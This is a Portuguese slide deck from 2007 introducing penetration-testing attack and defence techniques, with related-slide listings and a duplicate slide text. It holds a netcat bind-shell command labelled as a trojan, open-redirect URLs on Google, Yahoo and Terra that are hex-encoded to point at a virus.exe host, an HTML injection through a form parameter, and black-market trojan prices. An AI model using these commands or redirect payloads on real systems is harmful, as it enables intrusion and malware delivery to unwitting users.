PENTEST
Técnicas de invasão e defesa




                   Cleber Souza Brandao
                      clebeer@gmail.com
Cleber Brandão
cbrandao@brc.com.br
About me

   Utilizo linux há 7 anos
   Aulas de linux Faculdades Radial
   Formado Gerenciamento de Redes
   Suporte e aulas Projeto Telecentros SP
   Participante do ISSA-Brasil
   Testes de performance e segurança
    BRconnection®
Tópicos
   Técnicas de Invasão         Técnicas contra Invasão


Definindo um alvo            Firewall + IDS
Recolhendo informações       HIDS
Ferramentas úteis            HoneyPots
Phishing                     Antispam
Esteganografia
Técnicas de invasão
   Engenharia social
   Brute Force
   Espionagem
   Segurança por obscuridade
Definindo um alvo
 Onde buscar informações?
google
myspace
orkut
google groups
Google
Buscas específicas
Utilizando recursos avançados do google como
 as tags Intitle, Inurl, Intext

Podem te trazer resultados muito interessantes.
Pentest conisli07
Pentest conisli07
Pentest conisli07
Pentest conisli07
Engenharia social
Adão e Eva
   Primeiras vitimas de engenharia social
Apenas 2 coisas no mundo são infinitas, o
     universo e a estupidez humana.
               (Albert Einstein)
Ferramentas úteis
   google                 sendip
   dig                    john the ripper
   nmap                   host
   nessus                 hping3
   Metasploit             netcat
   telnet
dig
   Uma ferramenta similar ou nslookup porém
    mais flexível, pode ser utilizada para fazer
    buscas como A,TXT, MX e NS.
dig +qr google.com any
;; ANSWER SECTION:
google.com.     10186 IN        MX   10 smtp2.google.com.
google.com.     10186 IN        MX   10 smtp3.google.com.
google.com.     10186 IN        MX   10 smtp4.google.com.
google.com.     10186 IN        MX   10 smtp1.google.com.
google.com.     318637 IN       NS   ns1.google.com.
google.com.     318637 IN       NS   ns2.google.com.
google.com.     318637 IN       NS   ns3.google.com.
google.com.     318637 IN       NS   ns4.google.com.

;; AUTHORITY SECTION:
google.com.     318637   IN     NS   ns2.google.com.
google.com.     318637   IN     NS   ns3.google.com.
google.com.     318637   IN     NS   ns4.google.com.
google.com.     318637   IN     NS   ns1.google.com.

;; ADDITIONAL SECTION:
smtp1.google.com.   2986   IN    A    72.14.203.25
smtp2.google.com.   2986   IN    A    64.233.167.25
smtp3.google.com.   2986   IN    A    64.233.183.25
smtp4.google.com.   2986   IN    A    72.14.215.25
ns1.google.com.   345220   IN    A    216.239.32.10
ns2.google.com.   345220   IN    A    216.239.34.10
ns3.google.com.   345219   IN    A    216.239.36.10
ns4.google.com.   345219   IN    A    216.239.38.10
PortScan
Nmap
   é o mais famoso portscan existente hoje.
    (www.insecure.org/nmap). É uma ótima
    ferramenta, muito utilizado por hackers, para
    descobrir falhas no sistema, em portas abertas
    desnecessariamente.
Nessus
   O Nessus é uma ferramenta de auditoria muito
    usada para detectar e corrigir vulnerabilidades
    nos PCs da rede local porem é muito utilizado
    por hackers para descobrir a vulnerabilidade de
    um alvo.
Reports

Nessus Scan Report
SUMMARY
- Number of hosts which were alive during the test : 1
- Number of security holes found : 1
- Number of security warnings found : 1
- Number of security notes found : 15
Reports

DETAILS


. List of open ports :
 o smtp (25/tcp) (Security notes found)
 o ssh (22/tcp) (Security notes found)
 o ftp (21/tcp) (Security notes found)
Reports
Information found on port smtp (25/tcp)
  An SMTP server is running on this port
  Here is its banner :
  220 note-clebeer ESMTP Sendmail 8.14.1/8.14.1/Debian-8ubuntu1; Thu, 1 Nov
   2007 09:35:31 -0300; (No UCE/UBE) logging access from:
   localhost(OK)-localhost [127.0.0.1]
. Information found on port smtp (25/tcp)
  Remote SMTP server banner :
  220 note-clebeer ESMTP Sendmail 8.14.1/8.14.1/Debian-8ubuntu1; Thu, 1 Nov
   2007 09:35:57 -0300; (No UCE/UBE) logging access from:
   localhost(OK)-localhost [127.0.0.1]


  This is probably: Sendmail version 8.14.1
Reports

. Information found on port ssh (22/tcp)
  An ssh server is running on this port


. Information found on port ssh (22/tcp)
  Remote SSH version : SSH-2.0-OpenSSH_4.6p1 Debian-5build1
  Remote SSH supported authentication : publickey,password


  Remote SSH banner :
  CleBeer's |_b note.
Reports
Metasploit
      é um ambiente utilizado para escrever, testar, e
  executa códigos de exploit. Foi desenvolvido para prover
                       penetração
e testes em computadores relacionados a esse assunto, como
            também pesquisa de vulnerabilidade.
Metasploit
   Linha de comando



   Interface web
http://127.0.0.1:55555/
http://127.0.0.1:55555/
msfconsole
telnet www.alvo.com.br 80
Trying 200.189.171.181...
Connected to www.alvo.com.br.
Escape character is '^]'.


GET / HTTP/1.1
Host: www.alvo.com.br
Resultado
Server: Microsoft-IIS/5.0
X-Powered-By: ASP.NET
Content-Location: http://www.alvo.com.br/index.htm
Date: Thu, 01 Nov 2007 13:26:39 GMT
Content-Type: text/html
Accept-Ranges: bytes
Last-Modified: Tue, 19 Sep 2006 00:27:32 GMT
John the ripper
   Um programa usado para decifrar senhas
    suportado nas plataformas UNIX, DOS,
    WinNT?/Win95. É um programa disponível
    gratuitamente desenvolvido para decifrar
    senhas MD5, DES baseado na função CRYPT.
Usar senhas fortes?
Pentest conisli07
Nem sempre é a solução
hping3
   Mais uma ferramenta capaz de enviar pacotes
    TCP, UDP e ICMP personalizados e receber
    respostas como consegue em icmp. Com ele
    você pode enviar arquivos encapsulados e é
    util para ataques DoS.
netcat
   Programa para consultoria de redes muito
    conhecido, isso deve-se ao fato de ele ser um
    programa muito versátil, podendo desde ser
    um simples telnet, portscan até um sniffer.
Trojan
nc -l -e /bin/bash -p 1033

A porta 1033 será colocada em listenning,
 redirecionaremos a saída de dados para um
 shell (/bin/bash). Assim quando alguém se
 conectar a essa porta terá domínio total sobre
 o computador.
Sniffer
# nc -vv -z 75.126.176.71 -p 80 22 110 25 21
servidor9.molservidores.com [75.126.176.71] 22 (ssh) : Connection refused
servidor9.molservidores.com [75.126.176.71] 110 (pop3) open
servidor9.molservidores.com [75.126.176.71] 25 (smtp) open
servidor9.molservidores.com [75.126.176.71] 21 (ftp) open
Phishing
O que é phishing?

Phishing é um tipo de fraude projetada para
 roubar sua identidade. Em um phishing scam,
 uma pessoa mal-intencionada tenta obter
 informações como números de cartões de
 crédito, senhas, dados de contas ou outras
 informações pessoais convencendo você a
 fornecê-las sob pretextos enganosos.
Exemplos
Alguns sites famosos que permitem este tipo de
  fake:
google
yahoo
terra
Google
   http://www.google.com/pagead/iclk?sa=l&ai=Br3ycNQz5Q-
    fXBJGSiQLU0eDSAueHkArnhtWZAu-
    FmQWgjlkQAxgFKAg4AEDKEUiFOVD-4r2f-
    P____8BoAGyqor_A8gBAZUCCapCCqkCxU7NLQH0sz4&num=5&a
    durl=%63%6c%65%62%65%65%72%2e%6e%6f%2d%69%70%2e
    %6f%72%67%2f%76%69%72%75%73%2e%65%78%65
Yahoo
   http://br.wrs.yahoo.com/_ylt=A0geum1Mv9RGw4EB6FXz6Qt./SIG=1
    29lovkbd/EXP=1188434124/**%63%6c%65%62%65%65%72%2e
    %6e%6f%2d%69%70%2e%6f%72%67%2f
    %76%69%72%75%73%2e%65%78%65
Buscador terra
   http://buscador.terra.com.br/Redirector.aspx?
    bstat=terrastats01&type=CK&source=buscador.terra.com.br&id=spon
    sored&partner=google&query=nike&position=1&target=%63%6c
    %65%62%65%65%72%2e%6e%6f%2d%69%70%2e%6f
    %72%67%2f%76%69%72%75%73%2e%65%78%65
Destino???
   Nas 3 URLs anteriores a requisição seria
    encaminhada para:


          clebeer.no-ip.org/virus.exe
Outro Exemplo


http://www.cceinformatica.com.br/faleNew.php?mail=cvv@cce.com.br
Pentest conisli07
Adicionando...
&tipo=%3Cimg%20src=http://images.clebeer.multiply.com/logo/2%3E
Pentest conisli07
Esteganografia
   Esteganografia basicamente é uma técnica de
    esconder um arquivo dentro de outro arquivo,
    podendo ser uma imagem , ou documento do
    Word até mesmo uma planilha de excel e etc
    só que de uma forma criptografada.
jp(hide an seek)
   O jphide e o jpseek são programas utilizados
    para esconder mensagens em arquivos JPEG.
origem.jpg
destino.jpg
msg.txt

Ola esta mensagem e secreta
e somente pessoas que possuam a senha podem vê-la


senha: @@(##!(*#$#*(!(@&%$(@)codDEVdw)2231
Utilização
   Esconder mensagem:
jphide origem.jpg destino.jpg mensagem.txt

   Descobir mensagem:
jpseek destino.jpg texto-secreto.txt
Quanto vale?
   Trojan (Shell) - US$ 350,00 - US$700,00
   Trojan (Roubo de Senhas) - US$600,00
   Listagem E-mail (32 milhões) - US$1.500,00
   Milhões de Usuários do ICQ - US$150,00
   Proteção Contra Detecção do Trojan - US$20,00
   Suporte
Tecnicas contra invasão
   Firewall
   (NHWK)IDS
   HoneyPots
   Antispam
Firewall
   Port Knock, uma solução leve e fácil de
    configurar, permite que portas específicas só
    sejam abertas no momento desejado atraves
    de tentativas de conexão em portas
    específicas.
*IDS
   NIDS – Network Intrusion Detection System
   HIDS - Host-based Intrusion Detection System
   WIDS – Wireless Intrusion Detection System
   KIDS - Kernel Intrusion Detection System
Honeypot
   Útil para vigilância e alerta aos tipos de
    ataques mais utilizados porem deve ser
    utilizado com cuidado para que o invasor não
    tenha acesso a rede real.
Antispam
   Indispensável para qualquer MX, útil para evitar
    emails forjados e de domínios não confiaveis,
    pode ser incrementado com opções de RBL e
    CAPTCHA ("Completely Automated Public
    Turing test to tell Computers and Humans
    Apart").
Conclusão
   Com a popularidade do SL a informação ficou
    mais acessível o que colaborou para um maior
    avanço das técnicas de invasão, em contra
    partida os sistemas de segurança vem se
    tornando mais estáveis a casa dia.
Créditos
   www.google.com
   www.brc.com.br
   naopod.com.br
   spookerlabs.multiply.com
   http://cartilha.cert.br/malware/
Perguntas
OBRIGADO!

Mais conteúdo relacionado

PPTX
Zabbix e SNMP - Zabbix Conference LatAm - André Déo
PPT
Autenticação
PPT
PPT
por Bruno Milreu Filipe "Casos avançados de teste de invasão – Indo além do “...
PPTX
Técnicas de Invasão - INFOESTE 2015
 
PDF
Palestra: Pentest - Intrusão de Redes
PDF
Analise de Logs
PDF
Pentest Auto-Ensinado
Zabbix e SNMP - Zabbix Conference LatAm - André Déo
Autenticação
por Bruno Milreu Filipe "Casos avançados de teste de invasão – Indo além do “...
Técnicas de Invasão - INFOESTE 2015
 
Palestra: Pentest - Intrusão de Redes
Analise de Logs
Pentest Auto-Ensinado

Mais procurados (20)

PPT
Ethical hacking: Conceitos básicos de Testes de penetração
PDF
Metodos de invasao
PDF
Block Hosts: Bloqueando Ataques De ForçA Bruta (Brute Force) Em Ftp, Ssh E Ou...
PDF
Palestra Auditoria de Segurança em Redes sem Fio
ODP
FISL11: Protegendo webservers na intranet contra ataques Man-In-The-Middle
PDF
Ferramentas de Segurança
PPTX
Pentest Invasão e Defesa - AnonFeh
PDF
Invasão e Segurança
PPT
O submundo dos hackers: ataques e defesas
PDF
Aula 8.0 - Segurança
PDF
Espionagem e Software Livre
PDF
PDF
Ultrasurf - Entendendo e bloqueando
PDF
Criptografia com PHP
PDF
Vpn alan-rafael
PDF
Tunneling
PDF
Segurança básica de redes Wi-Fi
PPTX
Ataques na internet
PPTX
Aula 7 - Ataque de Força Bruta
PDF
Botnets
Ethical hacking: Conceitos básicos de Testes de penetração
Metodos de invasao
Block Hosts: Bloqueando Ataques De ForçA Bruta (Brute Force) Em Ftp, Ssh E Ou...
Palestra Auditoria de Segurança em Redes sem Fio
FISL11: Protegendo webservers na intranet contra ataques Man-In-The-Middle
Ferramentas de Segurança
Pentest Invasão e Defesa - AnonFeh
Invasão e Segurança
O submundo dos hackers: ataques e defesas
Aula 8.0 - Segurança
Espionagem e Software Livre
Ultrasurf - Entendendo e bloqueando
Criptografia com PHP
Vpn alan-rafael
Tunneling
Segurança básica de redes Wi-Fi
Ataques na internet
Aula 7 - Ataque de Força Bruta
Botnets
Anúncio

Semelhante a Pentest conisli07 (20)

PPTX
Pentest invasoedefesa-anonfeh-130416201153-phpapp01 (1)
PDF
Ferramentas GPL para segurança de redes - Vanderlei Pollon
PDF
Manual hacker
PPT
Mini Curso - Pen Test - Univem
PPTX
Back track apresentação
PPT
Nota de aula seguranca da informacao - redes de computadores
PDF
Webinar # 16 – Ataques de Força Bruta – Método Dicionário, Híbridos e Rainbow...
PDF
Sniffers Parte 3
PPTX
Workshop - Fundamentos de Ethical Hacking
PDF
Segurança de sistema firewall
PDF
PenTest com Kali Linux - FLISOL DF 2013
PDF
Segurança em Aplicações Web
PDF
Sniffers Parte 2
PPTX
P3nte5t w1th Arm1t4ge - Lucas Oliveira Dantas
PDF
Ferramentas livres para teste de invasao
PDF
Nessus e Metaesploit - Prática de Ataques
PDF
Unidade5 footprint
PDF
Workshop Análise Forense Computacional - Clavis Segurança da Informação && Ri...
PPTX
Introdução ao teste de intrusão em redes
PPTX
Firewall
Pentest invasoedefesa-anonfeh-130416201153-phpapp01 (1)
Ferramentas GPL para segurança de redes - Vanderlei Pollon
Manual hacker
Mini Curso - Pen Test - Univem
Back track apresentação
Nota de aula seguranca da informacao - redes de computadores
Webinar # 16 – Ataques de Força Bruta – Método Dicionário, Híbridos e Rainbow...
Sniffers Parte 3
Workshop - Fundamentos de Ethical Hacking
Segurança de sistema firewall
PenTest com Kali Linux - FLISOL DF 2013
Segurança em Aplicações Web
Sniffers Parte 2
P3nte5t w1th Arm1t4ge - Lucas Oliveira Dantas
Ferramentas livres para teste de invasao
Nessus e Metaesploit - Prática de Ataques
Unidade5 footprint
Workshop Análise Forense Computacional - Clavis Segurança da Informação && Ri...
Introdução ao teste de intrusão em redes
Firewall
Anúncio

Mais de Roberto Castro (11)

PDF
Tutorial de instalacao_do_zabbix_2.0.0
PDF
Slide lpi mudancas lpic1
PDF
O feng office open source
PDF
Nfs protocol sequence_diagram
PDF
Mini curso hacker
PDF
Livropfsense2 0ptbr-120227112435-phpapp02
PDF
Aula20 open vpn
PDF
Aula14 vsftp de-introopenldap
PDF
93511895 lm-87-ce
PDF
2 virtualizacao
PDF
Servicos de internet
Tutorial de instalacao_do_zabbix_2.0.0
Slide lpi mudancas lpic1
O feng office open source
Nfs protocol sequence_diagram
Mini curso hacker
Livropfsense2 0ptbr-120227112435-phpapp02
Aula20 open vpn
Aula14 vsftp de-introopenldap
93511895 lm-87-ce
2 virtualizacao
Servicos de internet

Pentest conisli07

  • 1. PENTEST Técnicas de invasão e defesa Cleber Souza Brandao [email protected]
  • 3. About me  Utilizo linux há 7 anos  Aulas de linux Faculdades Radial  Formado Gerenciamento de Redes  Suporte e aulas Projeto Telecentros SP  Participante do ISSA-Brasil  Testes de performance e segurança BRconnection®
  • 4. Tópicos  Técnicas de Invasão  Técnicas contra Invasão Definindo um alvo Firewall + IDS Recolhendo informações HIDS Ferramentas úteis HoneyPots Phishing Antispam Esteganografia
  • 5. Técnicas de invasão  Engenharia social  Brute Force  Espionagem  Segurança por obscuridade
  • 6. Definindo um alvo  Onde buscar informações? google myspace orkut google groups
  • 7. Google Buscas específicas Utilizando recursos avançados do google como as tags Intitle, Inurl, Intext Podem te trazer resultados muito interessantes.
  • 13. Adão e Eva  Primeiras vitimas de engenharia social
  • 14. Apenas 2 coisas no mundo são infinitas, o universo e a estupidez humana. (Albert Einstein)
  • 15. Ferramentas úteis  google  sendip  dig  john the ripper  nmap  host  nessus  hping3  Metasploit  netcat  telnet
  • 16. dig  Uma ferramenta similar ou nslookup porém mais flexível, pode ser utilizada para fazer buscas como A,TXT, MX e NS.
  • 17. dig +qr google.com any ;; ANSWER SECTION: google.com. 10186 IN MX 10 smtp2.google.com. google.com. 10186 IN MX 10 smtp3.google.com. google.com. 10186 IN MX 10 smtp4.google.com. google.com. 10186 IN MX 10 smtp1.google.com. google.com. 318637 IN NS ns1.google.com. google.com. 318637 IN NS ns2.google.com. google.com. 318637 IN NS ns3.google.com. google.com. 318637 IN NS ns4.google.com. ;; AUTHORITY SECTION: google.com. 318637 IN NS ns2.google.com. google.com. 318637 IN NS ns3.google.com. google.com. 318637 IN NS ns4.google.com. google.com. 318637 IN NS ns1.google.com. ;; ADDITIONAL SECTION: smtp1.google.com. 2986 IN A 72.14.203.25 smtp2.google.com. 2986 IN A 64.233.167.25 smtp3.google.com. 2986 IN A 64.233.183.25 smtp4.google.com. 2986 IN A 72.14.215.25 ns1.google.com. 345220 IN A 216.239.32.10 ns2.google.com. 345220 IN A 216.239.34.10 ns3.google.com. 345219 IN A 216.239.36.10 ns4.google.com. 345219 IN A 216.239.38.10
  • 19. Nmap  é o mais famoso portscan existente hoje. (www.insecure.org/nmap). É uma ótima ferramenta, muito utilizado por hackers, para descobrir falhas no sistema, em portas abertas desnecessariamente.
  • 20. Nessus  O Nessus é uma ferramenta de auditoria muito usada para detectar e corrigir vulnerabilidades nos PCs da rede local porem é muito utilizado por hackers para descobrir a vulnerabilidade de um alvo.
  • 21. Reports Nessus Scan Report SUMMARY - Number of hosts which were alive during the test : 1 - Number of security holes found : 1 - Number of security warnings found : 1 - Number of security notes found : 15
  • 22. Reports DETAILS . List of open ports : o smtp (25/tcp) (Security notes found) o ssh (22/tcp) (Security notes found) o ftp (21/tcp) (Security notes found)
  • 23. Reports Information found on port smtp (25/tcp) An SMTP server is running on this port Here is its banner : 220 note-clebeer ESMTP Sendmail 8.14.1/8.14.1/Debian-8ubuntu1; Thu, 1 Nov 2007 09:35:31 -0300; (No UCE/UBE) logging access from: localhost(OK)-localhost [127.0.0.1] . Information found on port smtp (25/tcp) Remote SMTP server banner : 220 note-clebeer ESMTP Sendmail 8.14.1/8.14.1/Debian-8ubuntu1; Thu, 1 Nov 2007 09:35:57 -0300; (No UCE/UBE) logging access from: localhost(OK)-localhost [127.0.0.1] This is probably: Sendmail version 8.14.1
  • 24. Reports . Information found on port ssh (22/tcp) An ssh server is running on this port . Information found on port ssh (22/tcp) Remote SSH version : SSH-2.0-OpenSSH_4.6p1 Debian-5build1 Remote SSH supported authentication : publickey,password Remote SSH banner : CleBeer's |_b note.
  • 26. Metasploit é um ambiente utilizado para escrever, testar, e executa códigos de exploit. Foi desenvolvido para prover penetração e testes em computadores relacionados a esse assunto, como também pesquisa de vulnerabilidade.
  • 27. Metasploit  Linha de comando  Interface web
  • 31. telnet www.alvo.com.br 80 Trying 200.189.171.181... Connected to www.alvo.com.br. Escape character is '^]'. GET / HTTP/1.1 Host: www.alvo.com.br
  • 32. Resultado Server: Microsoft-IIS/5.0 X-Powered-By: ASP.NET Content-Location: http://www.alvo.com.br/index.htm Date: Thu, 01 Nov 2007 13:26:39 GMT Content-Type: text/html Accept-Ranges: bytes Last-Modified: Tue, 19 Sep 2006 00:27:32 GMT
  • 33. John the ripper  Um programa usado para decifrar senhas suportado nas plataformas UNIX, DOS, WinNT?/Win95. É um programa disponível gratuitamente desenvolvido para decifrar senhas MD5, DES baseado na função CRYPT.
  • 36. Nem sempre é a solução
  • 37. hping3  Mais uma ferramenta capaz de enviar pacotes TCP, UDP e ICMP personalizados e receber respostas como consegue em icmp. Com ele você pode enviar arquivos encapsulados e é util para ataques DoS.
  • 38. netcat  Programa para consultoria de redes muito conhecido, isso deve-se ao fato de ele ser um programa muito versátil, podendo desde ser um simples telnet, portscan até um sniffer.
  • 39. Trojan nc -l -e /bin/bash -p 1033 A porta 1033 será colocada em listenning, redirecionaremos a saída de dados para um shell (/bin/bash). Assim quando alguém se conectar a essa porta terá domínio total sobre o computador.
  • 40. Sniffer # nc -vv -z 75.126.176.71 -p 80 22 110 25 21 servidor9.molservidores.com [75.126.176.71] 22 (ssh) : Connection refused servidor9.molservidores.com [75.126.176.71] 110 (pop3) open servidor9.molservidores.com [75.126.176.71] 25 (smtp) open servidor9.molservidores.com [75.126.176.71] 21 (ftp) open
  • 42. O que é phishing? Phishing é um tipo de fraude projetada para roubar sua identidade. Em um phishing scam, uma pessoa mal-intencionada tenta obter informações como números de cartões de crédito, senhas, dados de contas ou outras informações pessoais convencendo você a fornecê-las sob pretextos enganosos.
  • 43. Exemplos Alguns sites famosos que permitem este tipo de fake: google yahoo terra
  • 44. Google  http://www.google.com/pagead/iclk?sa=l&ai=Br3ycNQz5Q- fXBJGSiQLU0eDSAueHkArnhtWZAu- FmQWgjlkQAxgFKAg4AEDKEUiFOVD-4r2f- P____8BoAGyqor_A8gBAZUCCapCCqkCxU7NLQH0sz4&num=5&a durl=%63%6c%65%62%65%65%72%2e%6e%6f%2d%69%70%2e %6f%72%67%2f%76%69%72%75%73%2e%65%78%65
  • 45. Yahoo  http://br.wrs.yahoo.com/_ylt=A0geum1Mv9RGw4EB6FXz6Qt./SIG=1 29lovkbd/EXP=1188434124/**%63%6c%65%62%65%65%72%2e %6e%6f%2d%69%70%2e%6f%72%67%2f %76%69%72%75%73%2e%65%78%65
  • 46. Buscador terra  http://buscador.terra.com.br/Redirector.aspx? bstat=terrastats01&type=CK&source=buscador.terra.com.br&id=spon sored&partner=google&query=nike&position=1&target=%63%6c %65%62%65%65%72%2e%6e%6f%2d%69%70%2e%6f %72%67%2f%76%69%72%75%73%2e%65%78%65
  • 47. Destino???  Nas 3 URLs anteriores a requisição seria encaminhada para: clebeer.no-ip.org/virus.exe
  • 52. Esteganografia  Esteganografia basicamente é uma técnica de esconder um arquivo dentro de outro arquivo, podendo ser uma imagem , ou documento do Word até mesmo uma planilha de excel e etc só que de uma forma criptografada.
  • 53. jp(hide an seek)  O jphide e o jpseek são programas utilizados para esconder mensagens em arquivos JPEG.
  • 56. msg.txt Ola esta mensagem e secreta e somente pessoas que possuam a senha podem vê-la senha: @@(##!(*#$#*(!(@&%$(@)codDEVdw)2231
  • 57. Utilização  Esconder mensagem: jphide origem.jpg destino.jpg mensagem.txt  Descobir mensagem: jpseek destino.jpg texto-secreto.txt
  • 58. Quanto vale?  Trojan (Shell) - US$ 350,00 - US$700,00  Trojan (Roubo de Senhas) - US$600,00  Listagem E-mail (32 milhões) - US$1.500,00  Milhões de Usuários do ICQ - US$150,00  Proteção Contra Detecção do Trojan - US$20,00  Suporte
  • 59. Tecnicas contra invasão  Firewall  (NHWK)IDS  HoneyPots  Antispam
  • 60. Firewall  Port Knock, uma solução leve e fácil de configurar, permite que portas específicas só sejam abertas no momento desejado atraves de tentativas de conexão em portas específicas.
  • 61. *IDS  NIDS – Network Intrusion Detection System  HIDS - Host-based Intrusion Detection System  WIDS – Wireless Intrusion Detection System  KIDS - Kernel Intrusion Detection System
  • 62. Honeypot  Útil para vigilância e alerta aos tipos de ataques mais utilizados porem deve ser utilizado com cuidado para que o invasor não tenha acesso a rede real.
  • 63. Antispam  Indispensável para qualquer MX, útil para evitar emails forjados e de domínios não confiaveis, pode ser incrementado com opções de RBL e CAPTCHA ("Completely Automated Public Turing test to tell Computers and Humans Apart").
  • 64. Conclusão  Com a popularidade do SL a informação ficou mais acessível o que colaborou para um maior avanço das técnicas de invasão, em contra partida os sistemas de segurança vem se tornando mais estáveis a casa dia.
  • 65. Créditos  www.google.com  www.brc.com.br  naopod.com.br  spookerlabs.multiply.com  http://cartilha.cert.br/malware/